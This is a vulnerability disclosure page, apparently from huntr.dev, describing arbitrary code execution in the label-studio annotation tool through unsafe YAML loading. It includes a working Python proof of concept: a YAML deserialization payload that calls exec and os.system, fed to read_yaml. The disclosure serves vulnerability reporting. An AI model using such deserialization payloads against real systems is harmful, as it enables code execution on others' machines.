Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
huntrAnon-artist1-PYPI-LABEL-STUDIO
HistoryFeb 13, 2021 - 12:00 a.m.

Code Injection in heartexlabs/label-studio

2021-02-1300:00:00
anon-artist
www.huntr.dev
11
code injection
heartexlabs label-studio
yaml deserialization
arbitrary code execution
data labeling
annotation tools
proof of concept
python.
JSON

Description

Label Studio is a swiss army knife of data labeling and annotation tools which is vulnerable to Arbitrary Code Execution.

Vulnerability

Vulnerable to YAML deserialization attack caused by unsafe loading.

Proof of Concept

Installation

pip3 install label-studio

Run exploit.py

import os
#os.sysem('pip3 install label-studio')
from label_studio.utils import io
payload = """cmd: !!python/object/new:type
  args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
  listitems: "__import__('os').system('xcalc')"
"""
open('config.yml','w+').write(payload)
io.read_yaml('config.yml')
  • python3 exploit.py

Impact

Arbitary Code Execution

JSON